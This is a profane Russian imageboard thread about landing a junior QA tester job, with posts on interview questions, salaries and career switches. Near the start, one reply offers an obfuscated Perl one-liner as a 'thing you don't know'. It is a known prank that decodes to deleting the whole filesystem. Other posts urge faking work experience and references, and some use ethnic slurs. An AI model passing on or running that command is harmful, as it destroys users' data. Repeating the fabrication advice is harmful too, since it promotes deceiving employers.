|
Как блять вкатиться в ойти ваше? Уже пару месяцев штурмую позицию тестировщика, ни джуном, ни мидлом брать не хотят, тупые отписки в стиле мало опыта, уже и пиздаболю что есть опыт, не помогает. Учился 4 месяца, на хорошем уровне, все знаю блять. Прошу на позицию джуна 70к, на мидла 100к. За полгода обучения параллельно делал свой наебизнес. Вышел на 350к в месяц, заработал уже 2+ млн. какого блять хуя бизнес выстрелил, а айти нет? |
|
> Учился 4 месяца >все знаю блять )))))) |
|
>> Учился 4 месяца >>все знаю блять что я могу не знать обычным говнотестером? |
|
>что я могу не знать обычным говнотестером? примерно ничего не знаешь))0) |
|
>примерно ничего не знаешь))0) например?))0) |
|
вот это не знаешь cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see' |
|
>Мне курла и сваггера хватает если просто ручку дёрнуть. Сваггер для богатых компаний. куда я вкатывался, сваггера нет ни где. Ручки сам берешь и в постмане ебашишь. Плюс документацию пишешь. пошел нахуй |
|
Уверяю такой код увольняет тебя с работы нахуй Кстати друг ищет перловиков на ебейший легаси |
|
>Кстати друг ищет перловиков на ебейший легаси мои соболезнования |
|
Соглы, нестабильная хуйня. А как вкатился? Кредиты брал? Чем торгуешь? |
|
>А как вкатился? Кредиты брал? Чем торгуешь? Просто решил рискнуть, да взял 300к на первый закуп. Всякой хуйней без лицензии, чаи например |
|
Никак, пердиксище ты тупорогое. Айтишка сдохла уже 2 года как, хайринг стопнулся тоже, на хуй ты только вкатишься, гребень ты прыщавый, ггг. |
|
Ложь. В айтишке сеучас лютейших дефицит, просто полный ноль кандидатов. Только зелень которая "все умеет" за 400к, а на собесе даже до джун- не дотягивает по знаниям. |
|
Может проблема уже не в кандидатах, а в том что кабаны зажрались и хотят Джуна со знанием всего и опытом в 30 лет и при возрасте 25... |
|
>возрасте 25... ну мне 25, просто я не знаю, что блять нужно уметь, чтобы не вкатиться |
|
Кабаны вообще джунов сейчас не хотят, а вот то что ты перечислил хотят и готовы платить пресловутые 300к и больше |
|
Ага, рассказывай... Я 10 лет занимался программированием, знаю С/С++, Asm, Delphi, SQL, имею опыт программирования микроконтроллеров, контрибутил в опенсорс... Но никому нахуй не нужен, сижу без работы. Всем подавай ПОДТВЕРЖДЁННЫЙ КОММЕРЧЕСКИЙ ОПЫТ от 5 лет, до техсобесов дело даже не доходило... Видимо потому что я всратый, хрюши обычно вообще не рассматривают мою кандидатуру. Очевидно, что в айтишке уже такой профицит кадров, что даже хрюшам официально разрешено отбирать чедов со стажем, а на технические знания всем похуй - они подразумеваются сами собой... |
|
Да да, именно, поэтому меня берут с судимостью на нормально бабла. >Я 10 лет занимался программированием, знаю С/С++, Asm, Delphi, SQL, имею опыт программирования микроконтроллеров, контрибутил в опенсорс ты 10 лет занимался хуетой. Тебя в лучшем случае ждут эмбед, но там денег меньше или ультралегаси срань |
|
>с судимостью на нормально бабла. Статья какая? |
|
>228 Срать на дваче не бросим? |
|
Нет, решил покататься по городу на каршере в мясо упоротым на 1 января, при себе было разного лет на 8, благо наши суды самые гуманные суды в мире |
|
Ну а я веб-говной заниматься не хочу ни за какие деньги. Плавали, знаем... JS, PHP, HTML, CSS - самая отвратительная хуйня, хуже придумать невозможно. Лучше уж легаси 90-х ковырять... |
|
СSS охуенно, ты попробуй, такую красоту делать будешь! |
|
Воистину эмбеддеры это пезды от мира айти. Вот бы чтобы в попу дули на мои таланты кодинга на умершем дельфи и два коммита в опенсорс в духе "поправил грамматическую ошибку в ридми" в никому ненужной библиотеке |
|
> хрюши обычно вообще не рассматривают мою кандидатуру А ты фотку в резюме прикрепляешь чтоле? |
|
тян с пика зарабатывает больше 90% айтишников |
|
>тян с пика зарабатывает больше 90% айтишников Вебкам бляди, только у тебя психика отъебнет |
|
>только у тебя психика отъебнет С чего бы? |
|
>сосать хуи Ну, то есть тоже самое что и капчевать только еще и платят |
|
да, это действительно правда. |
|
Не факт, не все вебкамщины 100500 мильёнов лутают. |
|
>уже и пиздаболю что есть опыт Волк ты? |
|
практически, в целом на собесах уже без опыта в 3 года не берут |
|
Чел, тестер - профессия с самым низким порогом входа. Там конкуренция ебейшая, пиздец, вкатывается процентов 10 от силы, остальные сдуваются. Если так хочешь вкатиться, то нужно попасть по знакомству для начала, хоть в микро-шарашу на 10 человек с офисом в подвале. |
|
>Чел, тестер - профессия с самым низким порогом входа. Там конкуренция ебейшая, пиздец, вкатывается процентов 10 от силы, остальные сдуваются. >Если так хочешь вкатиться, то нужно попасть по знакомству для начала, хоть в микро-шарашу на 10 человек с офисом в подвале. А куда вкатываться тогда? Я просто в ахуе, у айтишников самые большие привилегии в плане удаленки и ипотек |
|
Я тебе написал - самый реальный вариант - вкатиться на первую работу по знакомству. Это нормально. Я на первую работу в ИТ тоже вкатился по знакомству, в универе профессор меня порекомендовал своему бывшему однокурснику, у которого была мелкая попильно-откатная шаражка по написанию говно-софта для одной гос конторы. |
|
Забашлять бабок кому-то и все |
|
Угу, деплой по фтп, фулстак плюс починка принтера в придачу, 0 релевантного для крупной компании опыта, при попытке рассказать как было - мы вам перезвоним еще на этапе хрюшиного скрина. В итоге пиздишь ровно так же, как и нулевые хуесосы, разница тупо в полгода-год проебанного времени + выученные хуевые привычки в разработке |
|
>Угу, деплой по фтп, фулстак плюс починка принтера в придачу, 0 релевантного для крупной компании опыта Не пизди, я там прогал на Java два года, узнал дофига в отличие от однокурсников, которые балду гоняли и к 5 курсу так нифига и не умели. Потом уже сам работу нашёл. |
|
>просто чуть-чуть не дотягивал Пхх, дядя, когда тебе после собеса говорят, что "ну ты чуть-чуть не дотягиваешь, мы решили продолжить с другим кандидатом", это буквально ты лох ебаный, только время у команды украл |
|
Еблан? Собесился на мидла. Причем ебали меня по микросервисам, БД, автотестам, мобилкам |
|
Дружище, при современной нехватке квалифицированных кадров, если ты годный мидл, но не проходишь по конкретному стеку\чутка не тянешь - тебе перезванивают и предлагают другую команду\контору, а не посылают нахуй. Айтишка вообще не то чтобы крупная отрасль, через 3-4 года начнешь встречать знакомые ебла на регулярной основе, так что все друг друга знают и подкинуть нормального кандидата при потоке вкатунов нормальная история. А ты со своими 4 месяцами производишь впечатление буквально пикрил |
|
>А ты со своими 4 месяцами производишь впечатление буквально пикрил Тестировщик ручник это не прогер. Что нужно знать, чтобы быть супер топом? |
|
Я тебе говорю, что любого миддла оторвут с руками. У меня недавно чел, которого я менторил, залетел С ПЕРВОГО ЖЕ СОБЕСА на 280к. Фронт, реакт. Пока челы с первого собеса думали, было еще 5, из них 4 оффера на +- ту же сумму. Вот и думай головой, какой из тебя специалист. |
|
>которого я менторил, залетел С ПЕРВОГО ЖЕ СОБЕСА на 280к. Фронт, реакт. >Пока челы с первого собеса думали, было еще 5, из них 4 оффера на +- ту же сумму. >Вот и думай головой, какой из тебя специалист. Да не пизди, посоветовал вот и все |
|
БД(скуль/нереляционки), тест-дизайн, протоколы, уметь оформлять документацию, понимать в целом какие данные откуда берутся, куда передаются, где и как обрабатываются, понимать как работают очереди. Ты же банально с разрабами на разных языках разговариваешь, вы просто будете непонимат друг друга |
|
>Д(скуль/нереляционки), тест-дизайн, протоколы, уметь оформлять документацию, понимать в целом какие данные откуда берутся, куда передаются, где и как обрабатываются, понимать как работают очереди. Ты же банально с разрабами на разных языках разговариваешь, вы просто будете непонимат друг друга Блять, это просто обязанности джуна, меня этим ебали за 100к на руки. Я еще в постмане автотесты блять писал на собесах, прогоны показывал как делать |
|
>Я еще в постмане автотесты блять писал на собесах, прогоны показывал как делать За 14 лет ни разу постманом не пользовался |
|
>За 14 лет ни разу постманом не пользовался Ебать, ты дебил? Ты прогоны чем делаешь? коллекции не нужны? |
|
Мне курла и сваггера хватает если просто ручку дёрнуть. >Ты прогоны чем делаешь? коллекции не нужны? На чём скажут на том и делаю, сейчас апи тесты на джесте написаны, гоняются в си. |
|
Это в каком хоть году? Дай угадаю, до 2022? |
|
>В итоге пиздишь ровно так же, как и нулевые хуесосы, разница тупо в полгода-год проебанного времени + выученные хуевые привычки в разработке Ну я прошел 30 собесов технических в крупные компании РФ, просто чуть-чуть не дотягивал, хотят хуй пойми кого, чтобы все знал и умел, еще и автотестером был |
|
>в крупные компании РФ Попробуй в не крупные. Попробуй в мелкие конторки ООО "Ероха-Софт" на 20 человек. Шанс попасть выше. В крупные конторы реально опыт требуют. |
|
>я прошел 30 собесов технических в крупные компании РФ Буквально зимой собесился на должность QA, собесов примерно столько же, почти каждое часа на полтоора, ахулиард отказов, но у меня 9 классов и судимость. В итоге получил оффер месяца через 3 поисков. Абсолютно все хотели кого-то кто выйдет и без ебли мозга будет хуярить, чему ты там научился за 4 месяца я хз, валил собесы имея стаж 14 лет. |
|
>В итоге получил оффер месяца через 3 поисков. >Абсолютно все хотели кого-то кто выйдет и без ебли мозга будет хуярить, чему ты там научился за 4 месяца я хз, валил собесы имея стаж 14 лет. Нихуя не понятно, что ты написал |
|
>А куда вкатываться тогда? >самые большие привилегии А вот чтобы не было таких вопросов, надо было идти в нормальный вуз на востребованную спецуху. Теперь все уже, поезд с недогретым айти и пылесосингом рынка ушел, да и недолго айтишке осталось. Получается кабанить - ну и кабань себе, потом еще какую темку найдешь, такой майндсет нигде и никогда не пропадет. |
|
>Получается кабанить - ну и кабань себе, потом еще какую темку найдешь, такой майндсет нигде и никогда не пропадет. не согласен, чтобы реально торговать на 200-400к, нужен оборот где-то в 10 млн. Да, через время будет больше. Но тут риски в х5 больше |
|
Если ты будешь вкладывать в кабанинг столько же времени и усилий, сколько у тебя уйдет, чтобы залететь, не вылететь и апнуться в норм конторе - ты в кабанинге уйдешь в разы дальше. |
|
> параллельно делал свой наебизнес В чём проблема, нахуй тебе глаза кодом выжигать тогда? Подскакивай кабанчиком, решай вопросики, мути темки. |
|
>мути темки. Некоторые темки незаконны |
|
Лет с 12 интересоваться программированием. /thread |
|
Чо за наебизнес? Этот. /thread |
|
соус? соус? соус? соус? соус? |
|
>Прошу на позицию джуна 70к, на мидла 100к Так ты тупой уебок занижающий зарплаты |
|
Блатцы, будьте людьми, и дайте совас. Длочить хотется. |
|
Может профильной вышки нет? |
|
>Может профильной вышки нет? Нет, вышка около айти. В двух конторах без профильной отказали. |
|
Тестировщиков столько не надо. Лучше разрабом вкатывайся. Не сильно сложнее в освоении базы, зато потенциальных вакансий больше. И перспективы лучше. |
|
>разрабом вкатывайся Без вышки нахуй не нужны |
|
> Вышел на 350к в месяц Нахуя тебе айти тогда? Там нужно постоянно обучаться и совершенствоваться. |
|
>Нахуя тебе айти тогда? Я же писал, что это разовая хуйня, тут чисто фортануло, вот июнь всего 200к |
|
Я имею ввиду у тебя времени не будет тупо. лучше развивайся в продажах. Я вот сам недавно вкатился, получаю как жун 40к и постоянно обучаюсь еще. |
|
Боюсь, что кабанычем пососу |
|
Изучай тогда 1с, и вакансий много, вкатится шансов на порядок больше, чем сраным тестировщиком, интереснее. чем сраное тестирование, и связана с бизнесом, если будешь в бизнесе сэкономишь на 1с прогере, лол |
|
Да в бизнесе даже CRM системы не нужны. Там еще курсы для ВБ продавали помню. Достаточно таблички excel |
|
> Достаточно таблички excel Для шаумичной возможно |
|
Ну так у меня и бизнес маленький. |
|
Зачем тебе е вкатываться в it, если ты и так 350к в месяц рубишь? |
|
>если ты и так 350к в месяц рубишь? Я взял кредит на 300к, купил хуйню дешево, точнее нашел связи, где купить дешево, продал на 600к, закрыл кредит, купил хуйню и так масштабировался. Заручился связями с кабанами на оптовых базах. Вот тупо арендую свой склад, кабаны ко мне приезжают забирают в розницу для себя |
|
ебанашка стажировку ищи а не джун вакансии бляяяяя |
|
>ебанашка стажировку ищи Бесплатную на полгода? |
|
ну если есть гарантии что после этого точно джуном возьмут, то можно и полгода бесплатно порабоать! |
|
>Ну как тебе идея про 1с? вообще годно, но глянул вакансий очень мало Тестеров 2к открытых 1с 200 |
|
Странно, я наоборот вижу сплошные 1с вакансии, может заскринишь? |
|
>может заскринишь? Давай ты? |
|
Удаленная работа без опыта - 197 вакансий Из них по запросу 1с - 71 вакансия |
|
попродуй мл дс или аналитику, там хоть стажировки точно оплачиваемые и вроде в айти самое сложное - это вкатиться, а дальше уже самому будут писать с приглашениями на собеседование |
|
>мл дс или аналитику, там хоть стажировки точно оплачиваемые Да там везде нужно быть волком |
|
>ойти >тестировщика >Учился 4 месяца, на хорошем уровне, все знаю блять Лооооол бля, вот это биомусор |
|
>Лооооол бля, вот это биомусор Ты с чего порвался? |
|
Для людей с iq < 100 - Тестирование, даже программировать нет нужды, конкуренция - ебанись какая высокая. Самое просто - фронтенд. Там даже ванильный жс не надо знать - 99% работы на фреймворке. НО высокая конкуренция. Бэк - вкат сложнее, все так же на фреймворках типа спринга, конкуренция чуть меньше. Инфраструктура - девопс, sre, *опс всех мастей (мл, sec) - вкат чуть сложнее чем бек, потому что зоопарк технологий больше и надо шарить за ОС, в целом +\- как бекэнд, но конкуренция сильно ниже. Есть еще экзотика типа разраба алгоритмов, или AI, но эт не для вкатышей уже, либо для вката через универ/ШАД. Доход - для чела с опытом (или гения без опыта) - от $4к Лимита по доходу почти нет, все зависит от локации и компании. Всегда можно выкатиться в манагеры или управление свои бизнесом (в сфере ОйТи). Лично знаю премеры когда тяночка после ШАД вкатывалась в СШП на норм позицию ML разраба, но эт редко конечно бывает. Если чел умный, iq > 110-120 то уже можно стараться дальше идти в специализацию, а не сидеть крудошлёпом. |
|
>Доход - для чела с опытом (или гения без опыта) - от $4к Сейчас бы лутать за 8 часов вдень 400к рублей |
|
Это выше средней зп в 6-10 раз, так что ебало закрой |
|
>Это выше средней зп в 6-10 раз, так что ебало закрой в долларах? Мне кажется минималка |
|
Тут 2 варианта: Ты троль Либо ты в манямире живёшь (замер/элита) |
|
>Либо ты в манямире живёшь (замер/элита) в США блять зарплата разраба 8к баксов |
|
В пидорашке на ххру не больше 5к баксов |
|
Ты че все 8ч решил работать? Лол |
|
>Ты че все 8ч решил работать? Лол В наебизнесе бывает так, что работаю 1 неделю в месяц, но круглые сутки |
|
Ну так не работай круглые сутки. Разрабы по тк работают. |
|
Лучше поясни, где меньше всего надо напрягаться. |
|
Зависит от проекта, но чаще всего девопс, или фронт. Девопс - там все на автоматизации, чем лучше сделал - тем меньше работы. В итоге вся работа - senior restart clicker Фронт - часто он идет быстрее разработки бека, написал кнопку, и ждешь пока бэкендеры ручку приделают к ней. |
|
Ожидание: senior restart clicker Реальность: yaml-developer и подтиратель жоп разрабов |
|
Все в твоих руках, настрой автоматизацию нормальную. |
|
А мне-то нахуя? Пусть сами настраивают, я сеньор ква автомасьон |
|
> Лично знаю премеры когда тяночка после ШАД вкатывалась в СШП на норм позицию ML разраба, но эт редко конечно бывает. В ШАД с бэкграундом универа она пошла же, так? |
|
Да, в ШАД есть магистратура |
|
>Как блять вкатиться в ойти ваше? Тащемта, тянки-зумерши словом айти называют вебкам. Так что с оп-видосом всё в порядке. |
|
>словом айти называют вебкам. Так что с оп-видосом всё в порядке. Они это называют фриланс |
|
чел люди по 200 отказов на собеседовании получают и не опускают руки а потом устраиваются и живут как сыр в маспо а ты тут разнылся |
|
>чел люди по 200 отказов на собеседовании получают и не опускают руки >а потом устраиваются и живут как сыр в маспо >а ты тут разнылся Да |
|
соберись тряпка! и пошел штурмовать ХХ и почты работодателей мимо хуярил спам рассылку в ойти и около ойти конторы и прокнуло |
|
>соберись тряпка! и пошел штурмовать ХХ и почты работодателей > >мимо хуярил спам рассылку в ойти и около ойти конторы >и прокнуло С какого раза? |
|
с бесчисленного искал работу 10 месяцев, без перерыва |
|
Я бы выбрал devops. Быстрее вкат чем в прогеры, и спрос есть. |
|
И по моим ощющениям конкуренция не такая как среди прогеров. |
|
Ну девопс занимается хуй пойми чем |
|
Почему это хуй пойми чем? Настраивает ИТ инфраструктуру. Сисадмин эдакий на максималках. |
|
>штурмую позицию тестировщика Ну давай поиграем, только без жопыты этой своей и своими словами, пасты не надо, это будет неинтересно. Ты ж у нас учился, а не мозги на куст повесил и нейросетке их доверил. Цикл жизни дефекта. Тестирование начинается на стадии....? Разница между северети и прирорити дефекта? Чо делать если дев быкует? Что обязательно надо писать в дефекте кроме названия, шагов и приоритета? Как сделать быстро скриншот участка в винде? А в маке? Пример негативного тестирования полей ввода пароль\логин? Как ты будешь писать юнит тесты для продукта без требований и фронтеэнда? Если ты у мамы ахатматизатор Разница между implicit \ explicit wait Что такое промис с точки зрения автотестинга и что нам надо помнить когда работаем с ним? Найти элемент на странинце можно по? А если по твоим данным их будет более одного? Собери все surname в массив циклом и выведи на консоль первое значение массива: { "worker": [ { "name": "value1", "surname": "value2" }, { "name": "value3", "surname": "value4" } ] } "ОПХУЙ" Разверни в обратном порядке, без цикла. Бонус: Дано массивы версий продухта: ["1.2.3","1.3.3","3.2.3"] ["1.1.1","2.3.1","3.2.3"] Напиши сравнивание |
|
>Ну давай поиграем, только без жопыты этой своей и своими словами, пасты не надо, это будет неинтересно. >Ты ж у нас учился, а не мозги на куст повесил и нейросетке их доверил. Сейчас в чатгпт загружу |
|
Ну иди нахуй. Я им и без тебя пользоваться смогу. Мы тебе не перезвоним. |
|
>Мы тебе не перезвоним. А я тебя и не просил |
|
Ну ты спросил, как вкатиться? вот тебе примерные задания которые спрашиваю на собесах Отвечай. |
|
>Цикл жизни дефекта. >Тестирование начинается на стадии....? >Разница между северети и прирорити дефекта? >Чо делать если дев быкует? >Что обязательно надо писать в дефекте кроме названия, шагов и приоритета? >Как сделать быстро скриншот участка в винде? А в маке? >Пример негативного тестирования полей ввода пароль\логин? >Как ты будешь писать юнит тесты для продукта без требований и фронтеэнда? > Как же я на собесах заебался на одни и теже вопросы отвечать |
|
>Цикл жизни дефекта. Сука долбаеб, открываешь баг на спринте, делаешь документацию, отправляешь тебе дебилу, ебешь тебя пока не закроешь, повторяешь еще раз и после этого закрываешь таску. >Тестирование начинается на стадии....? Еблан? На стадии требований блять, в конфлюенсе для кого пишут? >Разница между северети и прирорити дефекта? еще тупой вопрос, блять, дауну тестеру надо знать отъебывает оплата это значит alarm или кнопка стала другого цвета вот тебе и разница. >Чо делать если дев быкует? Его обязанность нам окружение делать, а не выебываться, если надо и без него можем справиться. а так пишешь тимлиду и ебешь его >Что обязательно надо писать в дефекте кроме названия, шагов и приоритета? окружение при котором произошел баг, версионность, какой стенд >Как сделать быстро скриншот участка в винде? А в маке? СУКАА >Пример негативного тестирования полей ввода пароль\логин? когда у тебя в требованиях написано, что словой хуй в логине нельзя писать, а ты написал и о чудо система не пропустила, вот тебе пример негативном тест кейса. >Как ты будешь писать юнит тесты для продукта без требований и фронтеэнда? Юнитом должен заниматься разраб, тестеры делают смоук. Дальше ебал писать тупые вопросы > >Если ты у мамы ахатматизатор > >Разница между implicit \ explicit wait >Что такое промис с точки зрения автотестинга и что нам надо помнить когда работаем с ним? >Найти элемент на странинце можно по? А если по твоим данным их будет более одного? > >Собери все surname в массив циклом и выведи на консоль первое значение массива: >{ >"worker": [ >{ >"name": "value1", >"surname": "value2" >}, >{ >"name": "value3", >"surname": "value4" >} >] >} > >"ОПХУЙ" Разверни в обратном порядке, без цикла. > >Бонус: >Дано массивы версий продухта: >["1.2.3","1.3.3","3.2.3"] >["1.1.1","2.3.1","3.2.3"] >Напиши сравнивание |
|
>Еблан? На стадии требований блять, в конфлюенсе для кого пишут? + >>Разница между северети и прирорити дефекта? >еще тупой вопрос, блять, дауну тестеру надо знать отъебывает оплата это значит alarm или кнопка стала другого цвета вот тебе и разница. + >>Чо делать если дев быкует? >Его обязанность нам окружение делать, а не выебываться, если надо и без него можем справиться. а так пишешь тимлиду и ебешь его + оки, тут я накосячил, имелов ввиде девелопер а не опс. Но логика правильная. >>Что обязательно надо писать в дефекте кроме названия, шагов и приоритета? >окружение при котором произошел баг, версионность, какой стенд + >>Как сделать быстро скриншот участка в винде? А в маке? >СУКАА - Так сложно написать? >>Пример негативного тестирования полей ввода пароль\логин? >когда у тебя в требованиях написано, что словой хуй в логине нельзя писать, а ты написал и о чудо система не пропустила, вот тебе пример негативном тест кейса. - допустим, можно было больше >>Как ты будешь писать юнит тесты для продукта без требований и фронтеэнда? >Юнитом должен заниматься разраб, тестеры делают смоук. ++ Ну на джуна макакича ручного я бы тебя взял, несмотря на то что рвешься ты с пполоборота. Это не надо, быстро закончишься. Ты только рот с мылом помой. Хамить будешь девелоперам, а не мне. Как-то так. 10 минут, вполне годно. |
|
>Как-то так. 10 минут, вполне годно. Да у меня крик души, я вот это раз 30 рассказывал. по 2 часа на техсобесах Примеры интеграционных сервисов, как тестить оплату. Как SQL заебывали на час рассказывать. Объединяли все что можно и нельзя. кибану, кафку, как разворачивать стенды, как мобилки тестировать, особенности гайдлайнов. Потом сидели, по часу тест дизайн дрочили на логику. Потом напиши 250 тест кейсов на нашу прогу в уме за 5 минут и все в таком духе |
|
Это за 100к потратил несколько месяцев и все изучил сам |
|
>Потом напиши 250 тест кейсов на нашу прогу в уме за 5 минут Маскимум птяь тестов сходу. Прямо сейчас я это(250) сделать не буду, будет проеб в качестве. Мои эстимейты на такое задание, это примерно час. Если вас это устраивает, то могу исполнить как тестовое задание с тайм мониторингом по времени отсылки письма >дрочили на логику И как? Повангую, что ты мог рваться на самом собесе и это пугало. Или сидеть в позиции "Я тут всебм такой охуенный заранее знаю все что вы меня будете српашивать" Спокойнее надо быть, никому не нужна ЧСВ истеричка на проекте. |
|
>Прямо сейчас я это(250) сделать не буду, будет проеб в качестве. >Мои эстимейты на такое задание, это примерно час. >Если вас это устраивает, то могу исполнить как тестовое задание с тайм мониторингом по времени отсылки письма Сбросили созвон, когда пару раз так сказал |
|
Ну значит контора говно, не надо туда. Тебе ж потом с этими мудаками работать. Совсем все плохо. Из Рфии? Ищите работу в европках, тут никто на вас самоутверждаться не будет. Нет, виза не проблема Начать рекомендую с Финки ии Дании или Чехии. Голлаху не рекомендую, будешь в ноль жить. Немцы аутяры ебаные, с ними работать можно только по решению суда. У французов нужен язык и там не любят иностранцев нанимать совсем. Польша --- ммммм. Кровавый финтех ы 99% и тысяча наглых и пиздливых хохлов, некоторые из них будут твоим лидом или менеджером. Не надо. Италия -- СРАЗУ НАХУЙ |
|
Конторы самые крупные в РФ Да, только я в ойти не работал, а только вкатываюсь |
|
Споконо напиши что ты год в рога и копыта работал и дай телефон знакомого с ЧП ии как оно там сейчас называется, если бекграунд чек будут делать Опционально Бельгия, если не парит жить в окружении турок(эти как раз норм) и глубинных конголезцев(та ну нахуй, мне с бэкгранудом 90х и умением технично совать в пятак стремно рядом с ними. Но у низ свое гетто, просто так на улице ты их не встретишь) |
|
>Конторы самые крупные в РФ Смешно было сейчас, включая то что ты выше писал относительно доебов на собесах. Тебе слова Гемальто, ЮБС или Гранд Парад, что-то говорят. Не в кол-ве голов скота смысл, это как раз наооборот минус. Если в лавке больше 3к людей по миру, это уже болото ебучее, без роста и полное шизы. |
|
И вообще забегай к нам на тематику. Там душновато, но иногда интересно. В /pr если чо сидим. Удачи там с поисками. |
|
> >Повангую, что ты мог рваться на самом собесе и это пугало. >Или сидеть в позиции "Я тут всебм такой охуенный заранее знаю все что вы меня будете српашивать" >Спокойнее надо быть, никому не нужна ЧСВ истеричка на проекте. Я максимально адекватен на собесах. Сидел спокойной и тихо Я сам приводил примеры негативных и позитивных тест кейсов с их прогами. Сам писал требования плюс минус |
|
> Цикл жизни дефекта. от заведения до закрытия тикета > Тестирование начинается на стадии....? прохождения первого кволити гейта > Разница между северети и прирорити дефекта? Ну ты еблан конечно из англеи дохуя. Разница между важностью и приоритетом. > Чо делать если дев быкует? втащить его лиду > Что обязательно надо писать в дефекте кроме названия, шагов и приоритета? Как воспроизвести, окружение и чо ожидается получить Можно еще кучу деталей ебануть, но это от проекта к проекту зависит. > Как сделать быстро скриншот участка в винде? А в маке? Неебу, у меня линукс. Винда и мак идут нахуй. ебашу через PrtScr кнопку и затем выделяю нужный кусок. > Пример негативного тестирования полей ввода пароль\логин? Сам то понял чо спросил? > Как ты будешь писать юнит тесты для продукта без требований и фронтеэнда? Если бэкенд есть, то можно на скриптах через курлы/постманы наебенить, только юнит тесты девы пишут, а не куа. На акуа вопросы отвечать лень. Мимо вообще не тестер ни разу, а девопс, 15 лет в индустрии |
|
>Цикл жизни дефекта. Такой же, как у неймспейса, в котором дефект возникает? Если кусок кода, где появился дефект, не вызывается никогда, то и цикла у него нет. >Тестирование начинается на стадии....? Целеполагания? Разным кодом будут пользоваться разные люди, от ученых до клинических идиотов. >Разница между северети и прирорити дефекта? Первый раз такое слышу, предположу, что приоритет дефекта зависит от того, где он возникает, напрмиер, если у нас баг при инициации функции, то его надо гасить в первую очередь, даже если дальше по циклу есть баги, пусть и более серьезные, без теста фиксить их не стоит. >Чо делать если дев быкует? Прислать стикер в Телеге и предложить кружечку горячего чая с печенькой, почти всегда работает. >Что обязательно надо писать в дефекте кроме названия, шагов и приоритета? Ээээ желательно название ошибки, если программист сам писал код и он психчиески вменяемый, то он поднимал кастомные исключения и быстро найдет кто там бурагозит. >Как сделать быстро скриншот участка в винде? А в маке? Альт+ПС делает скрин активного окна. В Вин 10 нет такой функции как в браузере в виде скрина произвольных размеров. >Пример негативного тестирования полей ввода пароль\логин? Да что угодно, в принципе... желательно отрабатывать эджкейсы по типу ввода 0, малых чисел (если кто-то попробует купить 0,000001 кг к примеру), бесконечно малых чисел. В Пайтон, наприиер, 15 нулей после запятой эквивалентно 0, поэтмоу ввод таких малых чисел должен хендлиться на этапе инпута, иначе может вызвать неожиданные ошибки, ну, напрмиер, 1 фемтомасса Солнца будет арвняться нулю. >Как ты будешь писать юнит тесты для продукта без требований и фронтеэнда? Прочитаю документацию к функции и прикину, что она должна делать. >Разница между implicit \ explicit wait ХЗ. >Что такое промис с точки зрения автотестинга и что нам надо помнить когда работаем с ним? Ленивый генератор. Помнить надо, что он ленивый не без причины, и, если ты начнешь перебирать его, то у тебя может все вылететь. И вообще, по-хорошему, между нами, ленивый генератор - это колхоз, если девелопер пишет что-то серьезное, то пусть немного мозгами пошевелит и выдаст индуктивное решение. >Собери все surname в массив циклом и выведи на консоль первое значение массива: Это джава? В Питоне будет [i[1] for i list]. >Напиши сравнивание Какое сравнивание? Их много. ХЗ, чисто дял интереса наотвечал, как вкатун с небольшим опытом работы. |
|
Пустите в /h/. Опу за пропуск бамп треду |
|
Потому что вас таких дегенератов целый /b, каждая вторая макака из-за злоебанных инфоцыган считает, что может прочить пару статей про php/js/питухон и идет штурмовать вакансии. Поздно, маня, вкатываться. К тому же у тебя вон бизнес есть. |
|
> ару статей про php/js/питухон и идет штурмовать И в чем не правы? В пхп любая макак сможет |
|
В том, что помимо отдельно взятой макаки, осилившей пхп есть другая такая же макака, осилившая пхп. И за ней еще штук 20. А вакансий 2-3. Вот и думай. |
|
Всё так. Поэтому в каждой вакансии соревнуются кто больше повесит на работника и кто будет за все это меньше платить. |
|
>Уже пару месяцев штурмую позицию тестировщика, ни джуном, ни мидлом брать не хотят, тупые отписки в стиле мало опыта, уже и пиздаболю что есть опыт, не помогает. Учился 4 месяца, на хорошем уровне, все знаю блять. Прошу на позицию джуна 70к, на мидла 100к. В голосину. Иди нахуй |
|
|
|
То чувство когда сидишь эникеем на удаленке за 115к закрывая от силы 5 тикетов в день и охуеваешь от долбоебов добровольно желающих вкатится в анальники. Я понимаю есть люди которых это прям прет, но в 90% случаев это люди которые зарятся на зарплаты которые доступны еще в дохуилионе областей даже в том же ойти но без этой постоянно ебли дроча и дедлайнов. Вы ебала представили этих людей у которых хобби это собесы проходить. Успешно вкатывался в веб макаки за 45к в 2010 спасибо больше не надо. |
|
> эникеем на удаленке за 115к закрывая от силы 5 тикетов в день и охуеваешь от долбоебов добровольно желающих вкатится в анальники То есть нихуя не делаешь |
|
Делаю но очень не постоянно, иногда плотно иногда реально нихуя весь день, но уж точно не ломаю с утра до вечера и выходные голову почему какая то криво написанная хуйня с кучей подключенных библиотек не работает. Обычно бомблю от того почему не работает комбинация криво написанного софта на системе. |
|
>зарплаты которые доступны еще в дохуилионе областей список областей в студию когда я открываю хедхантер и ищу вакухи на те же пресловутые 300+к, мне выдают вакухи либо манагеров, либо разработчиков |
|
>пресловутые 300+к Стоматологи, юристы, логисты, технадзор, директора по говну всякому. Потому что на 300к ты без образования или мозгов не дорастешь, будешь точно так же говно лопатить, но за компом. А с мозгами ты и в любой другой области состоишься, хоть стройке. |
|
В реальности самозанятый спец сантехник, электрик, сварщик, токарь, моторист лутает эти 100к на изи, конечно он не контору работает а на себя но это уж точно не сложнее чем дорасти до 300к в кодинге. А еще для романтиков есть вахты и море, там даже сраный моряк может столько лутать и работать месяц через месяц, главное понять что тебе больше заходит а не долбится в прогинг от которого тебе через месяц вздернуться захочется. |
|
|
|
load qa 200к удаленка, работаю 2-3 часа в день, перед релизом 4-5 часов. Запустил автостесты, сижу пержу, жду когда пройдут. Если буду уходить то только на 300к+ скуф 37 лвл |
|
Не знаю, мне заебись + есть куда расти + многие коллеги не вдупляют что я делаю. Стек такой сейчас: линукс\баш\сэсэаш графана\инфлюкс питон\ятанк докер\квм ансибль\женкинс жыра\конф Есть куда расти. Почекал вакансии, нацелен на это, чем больше плюсов, тем чаще хотят: postgres+++++++++ grafana+++++++ loadrunner+++++++ jmeter++++++ openshift++++ kubernetes++ docker++ k8s+ python++ fiddler+ jenkins+ |
|
>postgres+++++++++ Мое ебало, когда я только ее и изучал |
|
Мой уровень постгреса сейчас это 3 первых строчки поиска в гугле на стаке. А большего мне и не надо. Не знаю чего там они хотят. |
|
Обычно это подразумевает знание что постгрес это не название полового извращения и уметь в примтивный селект |
|
>Если буду уходить то только на 300к+ уже нет такого |
|
